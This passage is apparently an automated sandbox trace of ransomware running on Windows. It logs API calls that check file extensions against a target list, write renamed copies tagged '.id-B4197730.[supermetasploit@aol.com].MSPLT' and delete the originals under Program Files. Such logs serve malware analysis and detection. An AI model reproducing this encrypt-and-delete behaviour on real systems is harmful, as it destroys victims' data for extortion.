shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0173.311] lstrlenW (lpString=".zip") returned 4 [0173.311] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0173.311] lstrlenW (lpString=".rar") returned 4 [0173.311] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0173.311] lstrlenW (lpString=".bz2") returned 4 [0173.312] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0173.312] lstrlenW (lpString=".7z") returned 3 [0173.312] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0173.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0173.312] lstrlenW (lpString=".dbf") returned 4 [0173.312] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0173.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0173.312] lstrlenW (lpString=".1cd") returned 4 [0173.312] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0173.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0173.312] lstrlenW (lpString=".jpg") returned 4 [0173.312] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0173.312] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0173.312] lstrlenW (lpString="ServiceWatcherSchedule.xml") returned 26 [0173.312] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0173.312] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=4450) returned 1 [0173.313] CloseHandle (hObject=0x2fc) returned 1 [0173.313] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml")) returned 0x20 [0173.313] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0173.313] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0173.313] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0173.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0173.314] GetLastError () returned 0x0 [0173.314] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x1162, lpOverlapped=0x0) returned 1 [0173.316] WriteFile (in: hFile=0x2f4, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x1170, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x1170, lpOverlapped=0x0) returned 1 [0173.317] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0173.318] WriteFile (in: hFile=0x2f4, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x108, lpOverlapped=0x0) returned 1 [0173.318] SetEndOfFile (hFile=0x2f4) returned 1 [0173.318] CloseHandle (hObject=0x2f4) returned 1 [0173.319] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0173.319] SetEndOfFile (hFile=0x2fc) returned 1 [0173.320] CloseHandle (hObject=0x2fc) returned 1 [0173.320] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0173.320] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml")) returned 1 [0173.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0173.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0173.321] lstrlenW (lpString=".doc") returned 4 [0173.321] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0173.321] lstrlenW (lpString=".docx") returned 5 [0173.321] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0173.321] lstrlenW (lpString=".pdf") returned 4 [0173.321] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0173.321] lstrlenW (lpString=".xls") returned 4 [0173.321] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0173.321] lstrlenW (lpString=".xlsx") returned 5 [0173.321] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0173.321] lstrlenW (lpString=".ppt") returned 4 [0173.321] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0173.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0173.321] lstrlenW (lpString=".zip") returned 4 [0173.321] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0173.321] lstrlenW (lpString=".rar") returned 4 [0173.321] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0173.321] lstrlenW (lpString=".bz2") returned 4 [0173.321] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0173.321] lstrlenW (lpString=".7z") returned 3 [0173.321] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0173.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0173.321] lstrlenW (lpString=".dbf") returned 4 [0173.321] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0173.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0173.322] lstrlenW (lpString=".1cd") returned 4 [0173.322] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0173.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0173.322] lstrlenW (lpString=".jpg") returned 4 [0173.322] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0173.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0173.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0173.322] lstrlenW (lpString=".doc") returned 4 [0173.322] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0173.322] lstrlenW (lpString=".docx") returned 5 [0173.322] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0173.322] lstrlenW (lpString=".pdf") returned 4 [0173.322] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0173.322] lstrlenW (lpString=".xls") returned 4 [0173.322] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0173.322] lstrlenW (lpString=".xlsx") returned 5 [0173.322] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0173.322] lstrlenW (lpString=".ppt") returned 4 [0173.322] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0173.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0173.322] lstrlenW (lpString=".zip") returned 4 [0173.322] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0173.322] lstrlenW (lpString=".rar") returned 4 [0173.322] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0173.322] lstrlenW (lpString=".bz2") returned 4 [0173.322] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0173.322] lstrlenW (lpString=".7z") returned 3 [0173.322] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0173.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0173.323] lstrlenW (lpString=".dbf") returned 4 [0173.323] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0173.323] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0173.323] lstrlenW (lpString=".1cd") returned 4 [0173.323] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0173.323] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0173.323] lstrlenW (lpString=".jpg") returned 4 [0173.323] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0173.323] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0173.323] lstrlenW (lpString="Alphabet.xml") returned 12 [0173.323] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0173.324] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=791421) returned 1 [0173.325] CloseHandle (hObject=0x2fc) returned 1 [0173.325] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0x20 [0173.325] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.325] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0173.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0173.326] lstrlenW (lpString=".doc") returned 4 [0173.326] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0173.326] lstrlenW (lpString=".docx") returned 5 [0173.326] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0173.326] lstrlenW (lpString=".pdf") returned 4 [0173.326] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0173.326] lstrlenW (lpString=".xls") returned 4 [0173.326] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0173.326] lstrlenW (lpString=".xlsx") returned 5 [0173.326] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0173.326] lstrlenW (lpString=".ppt") returned 4 [0173.326] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0173.326] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0173.326] lstrlenW (lpString=".zip") returned 4 [0173.326] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0173.326] lstrlenW (lpString=".rar") returned 4 [0173.326] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0173.326] lstrlenW (lpString=".bz2") returned 4 [0173.326] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0173.326] lstrlenW (lpString=".7z") returned 3 [0173.326] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0173.326] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0173.326] lstrlenW (lpString=".dbf") returned 4 [0173.326] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0173.326] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0173.326] lstrlenW (lpString=".1cd") returned 4 [0173.326] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0173.326] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0173.326] lstrlenW (lpString=".jpg") returned 4 [0173.326] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0173.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0173.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0173.327] lstrlenW (lpString=".doc") returned 4 [0173.327] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0173.327] lstrlenW (lpString=".docx") returned 5 [0173.327] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0173.327] lstrlenW (lpString=".pdf") returned 4 [0173.327] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0173.327] lstrlenW (lpString=".xls") returned 4 [0173.327] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0173.327] lstrlenW (lpString=".xlsx") returned 5 [0173.327] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0173.327] lstrlenW (lpString=".ppt") returned 4 [0173.327] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0173.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0173.327] lstrlenW (lpString=".zip") returned 4 [0173.327] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0173.327] lstrlenW (lpString=".rar") returned 4 [0173.327] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0173.327] lstrlenW (lpString=".bz2") returned 4 [0173.327] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0173.327] lstrlenW (lpString=".7z") returned 3 [0173.327] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0173.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0173.327] lstrlenW (lpString=".dbf") returned 4 [0173.327] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0173.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0173.327] lstrlenW (lpString=".1cd") returned 4 [0173.327] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0173.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0173.328] lstrlenW (lpString=".jpg") returned 4 [0173.328] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0173.328] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0173.328] lstrlenW (lpString="Content.xml") returned 11 [0173.328] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0173.351] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=27045) returned 1 [0173.351] CloseHandle (hObject=0x348) returned 1 [0173.352] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20 [0173.352] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.356] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0173.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0173.356] lstrlenW (lpString=".doc") returned 4 [0173.356] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0173.356] lstrlenW (lpString=".docx") returned 5 [0173.356] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0173.356] lstrlenW (lpString=".pdf") returned 4 [0173.356] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0173.356] lstrlenW (lpString=".xls") returned 4 [0173.356] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0173.357] lstrlenW (lpString=".xlsx") returned 5 [0173.357] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0173.357] lstrlenW (lpString=".ppt") returned 4 [0173.357] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0173.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0173.357] lstrlenW (lpString=".zip") returned 4 [0173.357] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0173.357] lstrlenW (lpString=".rar") returned 4 [0173.357] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0173.357] lstrlenW (lpString=".bz2") returned 4 [0173.357] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0173.357] lstrlenW (lpString=".7z") returned 3 [0173.357] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0173.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0173.357] lstrlenW (lpString=".dbf") returned 4 [0173.357] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0173.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0173.357] lstrlenW (lpString=".1cd") returned 4 [0173.357] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0173.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0173.357] lstrlenW (lpString=".jpg") returned 4 [0173.357] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0173.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0173.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0173.357] lstrlenW (lpString=".doc") returned 4 [0173.357] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0173.357] lstrlenW (lpString=".docx") returned 5 [0173.357] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0173.357] lstrlenW (lpString=".pdf") returned 4 [0173.357] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0173.357] lstrlenW (lpString=".xls") returned 4 [0173.357] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0173.357] lstrlenW (lpString=".xlsx") returned 5 [0173.357] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0173.357] lstrlenW (lpString=".ppt") returned 4 [0173.358] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0173.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0173.358] lstrlenW (lpString=".zip") returned 4 [0173.358] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0173.358] lstrlenW (lpString=".rar") returned 4 [0173.358] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0173.358] lstrlenW (lpString=".bz2") returned 4 [0173.358] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0173.358] lstrlenW (lpString=".7z") returned 3 [0173.358] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0173.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0173.358] lstrlenW (lpString=".dbf") returned 4 [0173.358] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0173.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0173.358] lstrlenW (lpString=".1cd") returned 4 [0173.358] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0173.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0173.358] lstrlenW (lpString=".jpg") returned 4 [0173.358] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0173.358] lstrcmpiW (lpString1=".avi", lpString2=".MSPLT") returned -1 [0173.358] lstrlenW (lpString="boxed-split.avi") returned 15 [0173.358] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0173.386] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=84190) returned 1 [0173.386] CloseHandle (hObject=0x348) returned 1 [0173.386] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0x20 [0173.386] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.386] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.386] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0173.386] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0173.386] lstrlenW (lpString=".doc") returned 4 [0173.386] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0173.386] lstrlenW (lpString=".docx") returned 5 [0173.386] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0173.386] lstrlenW (lpString=".pdf") returned 4 [0173.386] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0173.386] lstrlenW (lpString=".xls") returned 4 [0173.386] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0173.386] lstrlenW (lpString=".xlsx") returned 5 [0173.387] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0173.387] lstrlenW (lpString=".ppt") returned 4 [0173.387] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0173.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0173.387] lstrlenW (lpString=".zip") returned 4 [0173.387] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0173.387] lstrlenW (lpString=".rar") returned 4 [0173.387] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0173.387] lstrlenW (lpString=".bz2") returned 4 [0173.387] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0173.387] lstrlenW (lpString=".7z") returned 3 [0173.387] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0173.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0173.387] lstrlenW (lpString=".dbf") returned 4 [0173.387] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0173.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0173.387] lstrlenW (lpString=".1cd") returned 4 [0173.387] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0173.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0173.387] lstrlenW (lpString=".jpg") returned 4 [0173.387] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0173.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0173.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0173.387] lstrlenW (lpString=".doc") returned 4 [0173.388] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0173.388] lstrlenW (lpString=".docx") returned 5 [0173.388] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0173.388] lstrlenW (lpString=".pdf") returned 4 [0173.388] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0173.388] lstrlenW (lpString=".xls") returned 4 [0173.388] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0173.388] lstrlenW (lpString=".xlsx") returned 5 [0173.388] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0173.388] lstrlenW (lpString=".ppt") returned 4 [0173.388] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0173.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0173.388] lstrlenW (lpString=".zip") returned 4 [0173.388] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0173.388] lstrlenW (lpString=".rar") returned 4 [0173.388] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0173.388] lstrlenW (lpString=".bz2") returned 4 [0173.388] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0173.388] lstrlenW (lpString=".7z") returned 3 [0173.388] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0173.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0173.388] 